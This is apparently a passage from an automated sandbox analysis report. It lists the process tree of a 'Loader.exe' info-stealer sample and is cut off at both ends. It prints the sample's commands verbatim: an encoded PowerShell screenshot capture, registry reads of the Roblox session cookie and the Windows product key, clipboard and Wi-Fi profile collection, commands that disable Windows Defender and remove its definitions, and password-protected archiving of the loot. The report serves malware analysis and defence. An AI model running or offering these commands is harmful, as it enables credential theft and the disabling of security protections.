CAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:4908
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5600
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o0kmaemb\o0kmaemb.cmdline"
        6⤵
        
        PID:2652
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B2D.tmp" "c:\Users\Admin\AppData\Local\Temp\o0kmaemb\CSCF93994E38EFC4514894AC3DABC745.TMP"
        7⤵
        
        PID:5432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2604
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5208
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5448
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4264
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2044
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:3948
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:2764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55362\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\clSUF.zip" *"
      4⤵
      PID:3940
    - - C:\Users\Admin\AppData\Local\Temp\_MEI55362\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI55362\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\clSUF.zip" *
        5⤵
        Executes dropped EXE
        
        PID:4780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:5940
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:1080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6072
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:3952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5360
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:1996
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4016
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:5204
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:5936
- C:\Users\Admin\AppData\Local\Temp\7zO095B5C68\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO095B5C68\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:5828
- - C:\Users\Admin\AppData\Local\Temp\7zO095B5C68\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO095B5C68\Loader.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5424
- C:\Users\Admin\AppData\Local\Temp\7zO095BCD78\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO095BCD78\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:3508
- - C:\Users\Admin\AppData\Local\Temp\7zO095BCD78\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO095BCD78\Loader.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4840
- C:\Users\Admin\AppData\Local\Temp\7zO095E7698\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO095E7698\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:4848
- - C:\Users\Admin\AppData\Local\Temp\7zO095E7698\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO095E7698\Loader.exe"
    3⤵
    - Executes dropped EXE
    PID:3392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO095E7698\Loader.exe'"
      4⤵
      PID:5912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO095E7698\Loader.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:6000
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5312
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1132
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5100
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:2644
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:5856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5660
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:564
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:6444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3236
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4084
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6508
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:4256
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:6516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:1200
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
